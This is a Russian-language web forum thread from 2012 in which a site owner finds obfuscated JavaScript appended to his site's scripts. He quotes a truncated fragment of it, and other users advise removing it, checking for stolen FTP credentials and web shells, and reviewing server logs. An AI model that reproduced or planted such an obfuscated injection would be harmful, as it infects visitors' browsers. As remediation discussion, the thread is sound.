| |
|
|
| | Всем привет
Сегодня захожу на свой сайт и антивирус говорит, что сайт не безопасен. Смотрю в джаваскрипты и вижу, что в самом конце добавлены строки типа
var dd33630="";function i1960cf79e49(){var jed980b=String,f4817f6c3=Array.prototype.slice.call(arguments).join(""),f110e42=f4
|
что это и как это там появилось? Как бороться...Спасибо | |
| |
|
|
| |
|
|
| |
для: ZeeG
(04.04.2012 в 23:23)
| | | Теперь это надо вырезать со страниц, и искать дыру в которой у вас возможна такая подстава. | |
| |
|
|
| |
|
|
| |
для: confirm
(05.04.2012 в 06:57)
| | | FileZilla может быть причиной? | |
| |
|
|
| |
|
|
| |
для: zeeg
(05.04.2012 в 10:44)
| | | скорее всего не она у вас пароли профукала, а антивирус не поймал трояна, который и спер пароли
как вариант
какой у вас антивирус?
либо действительно дыра на сайте, тут нужен анализ кода, а это дорогое удовольствие | |
| |
|
|
| |
|
|
| |
для: Valick
(05.04.2012 в 10:49)
| | | Яндекс версия на полгода | |
| |
|
|
| |
|
|
| |
для: zeeg
(05.04.2012 в 10:44)
| | | Может, но не именно она виновата, а как сказали уже - сперли доступ ftp. Вам надо проверить свой серевер на наличие shell. А можно залить таковой и через дыру, которая может быть есть в скриптах ваших. | |
| |
|
|
| |
|
|
| |
для: confirm
(05.04.2012 в 11:03)
| | | да нет в моих скриптах ничего особенного. не думаю, что там дырка есть. | |
| |
|
|
| |
|
|
| |
для: ZeeG
(05.04.2012 в 15:23)
| | | Вы обнаружили что либо обясняющее механизм этого заражения, который и позволяет вам так думать? | |
| |
|
|
| |
|
|
| |
для: ZeeG
(05.04.2012 в 15:23)
| | | Запрашивайте FTP-логи, и Web-логи, только по ним можно точно определить что произошло, но в 95% случаев троян на клиентской машине. | |
| |
|
|
| |
|
|
| |
для: ZeeG
(04.04.2012 в 23:23)
| | | Браузеры на каком движке ему подвержены? | |
| |
|
|
